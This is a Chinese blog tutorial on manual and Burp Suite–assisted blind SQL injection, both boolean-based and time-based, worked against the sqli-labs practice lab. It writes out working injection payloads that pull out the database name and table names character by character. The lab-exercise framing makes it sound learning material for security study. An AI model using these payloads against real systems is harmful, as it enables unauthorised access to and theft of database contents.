SQL注入盲注(布尔、时间)手工注入和半自动化注入

最新推荐文章于 2024-03-09 10:30:00 发布
最新推荐文章于 2024-03-09 10:30:00 发布
阅读量1.4k 收藏 11
点赞数 2
分类专栏: 安全 SQL注入 文章标签: mysql 安全 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60463414/article/details/126090945
版权

 

目录

一、SQL盲注概述

二、SQL盲注常用函数

三、基于布尔盲注的实例

a、布尔盲注流程:(手动猜测)

1、闭合方式判断

2、判断数据库长度

3、猜测数据库的第一个字符(substr函数)

4、猜测猜测security数据库中第一表的长度

5、猜测security数据库中第一表的的第一个字符(substr函数)

以此类推 。。。。

b、布尔盲注半自动化注入(burpsuite)

1、burpsuite抓取判断数据库第一个字符的包

 2、发送到Intruder(暴力破解模块)

五、基于时间盲注的实例

 a、时间盲注流程:(手动猜测)

1、判断数据库长度

2、判断数据库第一个字符

3、判断数据库security数据库中第一个表长度

b、时间盲注半自动化注入(burpsuite)

1、burpsuite抓取判断数据库第一个字符的包

2、设置爆破参数

3、排序响应包

一、SQL盲注概述

基于布尔的盲注

某些场合下,页面返回的结果只有两种(正确或错误)。通过构造SQL判断语句,查看页面的返回结果(Ture or False)来判断哪些SQL判断条件成立,通过此来获取数据库中的数据。

基于时间的盲注

又称延时注入,即使用延时功能的函数sleep、benchmark等,通过判断这些函数是否正常执行来获取数据库中的数据。

二、SQL盲注常用函数

a、if()

功能:条件判断

语法格式:if(expr1,expr2,expr3)  expr1为ture则返回expr2,expr1为false则返回expr3.

注:仅仅MySQL支持if(expr1,expr2,expr3)

 

b、length()

功能:发挥字符串的长度,以字节为单位

语法格式:length(str)

 

c、substr()、substring()

功能:从指定的位置开始,截取字符串指定长度的字符串

 语法格式:substr(str,pos) 或者substr(str,pos,len)

                   substring(str,pos)或者substring(str,pos,len)

参数说明:str:要提取字串的字符串

                  pos:提取字串的开始位置

                  len:指定要提取的长度

 

 d、延时函数sleep()

功能:让语句延迟执行一段时间,执行成功后返回0

语法格式:sleep(N),即延迟执行N秒

三、基于布尔盲注的实例

目标靶机:SQLi-labd less-8

典型应用场景:Web页面仅仅返回类似True或False的两种结果。

注入方式:进行SQL注入之后,根据页面返回的True或者False来得到数据库中的数据。

id=1 结果为真

id=-1 结果为假

a、布尔盲注流程:(手动猜测)

1、闭合方式判断

id=1'        结果为假

id=1' --+    结果为真 (单引号闭合)

2、判断数据库长度

/Less-8/?id=1' and length(database())>8 --+

 

/Less-8/?id=1' and length(database())=8 --+                             ##可知当前数据库字符数为8

3、猜测数据库的第一个字符(substr函数)

/?id=1' and substr(database(),1,1)='a' --+

/?id=1' and substr(database(),1,1)='s' --+                                 ##可知数据库第一个字符为's'

依此类推:

/?id=1' and substr(database(),2,1)='e' --+

   

 /?id=1' and substr(database(),3,1)='c' --+

 。。。。。。 得出数据库8个字符为'security'

4、猜测猜测security数据库中第一表的长度

Less-8/?id=1' and length((select table_name from information_schema.tables where table_schema='security'  limit 0,1))=6 --+

以此类推 第二表,第三张表。。。。

5、猜测security数据库中第一表的的第一个字符(substr函数)

/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema='security'  limit 0,1),1,1)='s' --+

以此类推 。。。。

b、布尔盲注半自动化注入(burpsuite)

以猜测数据库名为列

1、burpsuite抓取判断数据库第一个字符的包

/Less-8/?id=1' and substr(database(),1,1)='s' --+(抓包之前先执行一些判断参数一定正确)

 2、发送到Intruder(暴力破解模块)

要查看数据库第一个字符到第八个字符,每个位置的字符不定。

在暴力破解模块,模式为Cluster bomb

参数为两个,第一个为数据库的第几个字符,第二个为当前字符。

因为有当前数据库字符数为8,所以第一个参数为1~8,部长为1,第二个参数为数据库的字符(随机的),笔者这里是选择的全小写字母(因为笔者知道数据库名称)

然后点击右边的Start attack

默认排序

所以我们点击一些length,让其在length之列排序

 可见数据库每个位置的字符,都已经暴力破解出来

根据顺序数据库名为 : security

五、基于时间盲注的实例

原理:

 if(    length(    database()  )=8  ,     sleep(10)      ,     sleep(0)   )    拆分开的

如果数据库长度等于8,网页则会延迟10秒回显,否则延迟0秒

目标靶机:SQLi-labd less-9

 典型应用场景:Web页面仅仅返回类似True

 注入方式:进行SQL注入之后,根据页面时间延迟的现象来获取数据库中的数据。

 id=1 (真)

 id=adjflksjod (真)

 a、时间盲注流程:(手动猜测)

1、判断数据库长度

http:/ip/sqli-labs-master/Less-9?id=1' and if(length(database())=8,sleep(10),0) --+

当执行命令后,网页会延迟10,才正常回显。

可以按F12键,网络选项中,查看回显时间

2、判断数据库第一个字符

/?id=1' and  if(substr(database(),1,1)='s',sleep(10),3)--+ (可知第一个字符为s)

 以此类推 数据库名为security

3、判断数据库security数据库中第一个表长度

?id=1'  and if(length((select table_name from information_schema.tables where table_schema = database() limit 0,1))=6,sleep(5),1)--+

以此类推 第一张表

/?id=1' and  if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(10),3)--+

以此类推,第一张表为emails,第二张,第三张。。。。

b、时间盲注半自动化注入(burpsuite)

以猜测数据库名为列(默认知道数据库长度为8 )

1、burpsuite抓取判断数据库第一个字符的包

把数据包发送intruder模块

在暴力破解模块中,模式为Cluster bomb

参数为两个,第一个为数据库的第几个字符,第二个为当前字符。

2、设置爆破参数

第一个参数字典为1~8

第二个参数字典为a~z (在实战中,数据库名不一定全是小写字母)

3、排序响应包

点击Start attack

默认排序,不能观察

设置一下,就可以看出效果。

点击最上面Columns选项,里面的Response received,点击后就会多出一列

 点击Response received 

根据顺序,可得出数据库名为 security 

以此类推 表长度,表名。字段长度,字段名。。。。

 

 

 

 

凌晨两点半992
关注
  • 2
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入手工注入示例详解
09-10
之前和大家分享了基本的SQL注入的知识,这一篇讲的就是在得知注入点的之后,如何有效地进行脱裤。文章通过示例介绍的很详细,对大家的理解和学习很有帮助,下面来一起看看吧。
boolean型时间
qq_43238111的博客
05-20 766
两大类型 1.概念 1.1 为什么要使用 当我们构造错误的输入参数值,前端没有显示出报错信息,实现注入 2.布尔 2.1 原理 ①Boolean 是基于真假的判断(true or false); 不管输入什么,结果都只返回真 或假两种 情况; 通过 and 1=1 和 and 1=2 可以发现注入点。 ②Boolean 型的关键在于通过表达式结果与已知值进行比对,根据比对结果判断正 确与否 ③Boolean 注入是指构造 SQL 判断语句,通过查看页面的返回结果来推测哪些SQL
渗透测试基础-布尔时间
weixin_45488495的博客
04-09 3399
渗透测试基础-布尔时间实现的关键函数布尔靶场演练时间靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 的特点如它的名字那样,它关闭了因恶意语句而导致的报错,也没有了像显错注入那样醒目的提醒。它的提示会很隐晦,就看我们有没有能力能让它显现出来。 布尔时间 也分布尔时间,这里分别来了解一下各自的区别 布尔:相较于显错注入,反应会更隐晦,比如当执行的恶意语句条件为Fal
SQL-实战布尔
dkxkl1314的博客
03-09 1443
环境:win10靶场:sqli-labs-master就是在SQL注入过程中,SQL语句执行后,查询到的数据不能 回显到前端页面。此时,我们需要利用一些方法进行判断或者尝 试,这个过程称之为。而布尔就是SQL语句执行后,页面 不返回具体数据,数据库只返回0或者1(真or假)。类似于无法开口说话的人,只能通过点头和摇头来告诉你答案的正 确与否。在页面中,如果正确执行了用户构造的SQL语句,则返回一种页 面,如果 SQL语句执行错误,则执行另一种页面。
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。 此资源包含:宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB数据库)、SQL手工注入漏洞测试(Sybase数据库)、SQL手工注入漏洞测试(SQLite数据库)、SQL手工注入漏洞测试(Db2数据库)、SQL注入漏洞测试(参数加密)、SQL手工注入漏洞测试(MySQL数据库)、SQL注入漏洞测试(delete注入)、SQL过滤字符后手工注入漏洞测试、延时注入时间注入)等。 sqlmap等sql注入工具不能利用的SQL注入点,可尝试手工注入,或许有意外的惊喜,满足你的sql注入欲望。 来吧,小伙伴,尽情的下载、然后肆无忌惮的尝试手工注入吧。 来吧,小伙伴,尽情的下载、然后肆无忌惮的尝试手工注入吧。 SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
网络安全技术+XSS攻击和SQL注入攻击
04-11
XSS攻击和SQL注入攻击 网络安全技术初级学生
SQL注入-布尔时间
热门推荐
LJH1999ZN的博客
02-10 1万+
一、什么是 就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为。 通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。 二、的分类 基于布尔类型的 基于时间类型的 三、利用
SQL注入——手工注入
bosskim的博客
06-13 1194
温故知新,学习sql注入分类
渗透测试-SQL注入布尔时间
lza20001103的博客
04-20 2597
渗透测试-SQL注入布尔时间
MySQL延时时间-笔记(手工注入-有图)
qq_38149849的博客
10-03 1095
涉及到MySQL手工方面。
SQL注入-无回显】布尔:原理、函数、利用过程
06-14 6283
SQL注入-无回显】
SQL注入技巧之显中过滤逗号绕过详析
09-09
SQL注入的绕过技巧有很多,下面这篇文章主要给大家介绍了关于SQL注入技巧之显中过滤逗号绕过的相关资料,文中通过示例代码介绍的非常详细,需要的朋友们下面随着小编来一起学习学习吧
SQL注入之基于布尔详解
09-10
首先说明的注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入一般分为布尔和基于时间。这篇文章主要讲解的是基于布尔。下面来一起看看吧。
31-31.渗透测试SQL注入
最新发布
05-10
渗透测试SQL注入
(手工)【sqli-labs8-10】布尔时间
07-06 1120
Sql-】详细过程
布尔时间
arissa666的博客
07-18 35
输入语句之后没有回显到前端信息,需要用进行判断。
手工注入完成SQL注入漏洞
mammal7的博客
11-11 1338
通过手工注入完成dvwa中low等级的注入模块
SQL注入布尔时间
c_programj的博客
04-09 5730
SQL一、布尔常用函数函数替换布尔一般流程二、时间常用函数时间一般流程 一、布尔 当存在SQL注入时,攻击者无法通过页面或请求的返回信息,回显或获取到SQL注入语句的执行结果,这种情况就叫布尔就是利用返回的True或False来判断注入语句是否执行成功。它只会根据你的注入信息返回Ture跟Fales,也就没有了之前的报错信息。 **什么情况下考虑使用布尔?** 1. 该输入框存在注入点。 2. 该页面或请求不会回显注入语句执行结果,故无法使用UNI
SQL注入(boolean时间)
ws1813004226的博客
05-12 728
一、boolen boolen就是系统屏蔽返回错误信息,只返回是或不是,所以我们不能直观的得到数据库信息,在这里,我们就只能通过boolen进行注入。 我们依旧使用pikachu靶场进行测试,这里肯定是存在SQL注入的,就不再多作演示。 我们先看一下为什么这里只能用boolen注入。我们在union和boolen注入处都输入: kobe' order by 3# 可以看到,uhion注入是不屏蔽报错信息的,而boolen注入只显示你输入有误,屏蔽了报错信息。 而只有当我们输入正确的时候,才会返
皮卡丘sql注入
10-23
皮卡丘SQL注入是一种SQL注入攻击技术,它利用了Web应用程序中存在的安全漏洞,通过构造恶意的SQL语句来获取敏感信息或者执行非授权的操作。是指攻击者无法直接获取数据库中的数据,而是通过不断地试错和推断来获取数据。 在攻击中,攻击者需要通过构造特定的SQL语句来判断数据库中的数据是否符合自己的要求。攻击者可以通过不断地尝试不同的语句和参数来推断出数据库中的数据,例如通过判断某个条件是否成立来确定某个字段的值。 皮卡丘SQL注入是一种比较常见的SQL注入攻击技术,它利用了Web应用程序中存在的安全漏洞,通过构造恶意的SQL语句来获取敏感信息或者执行非授权的操作。攻击者可以通过构造特定的SQL语句来判断数据库中的数据是否符合自己的要求,例如通过判断某个条件是否成立来确定某个字段的值。攻击者可以通过不断地尝试不同的语句和参数来推断出数据库中的数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值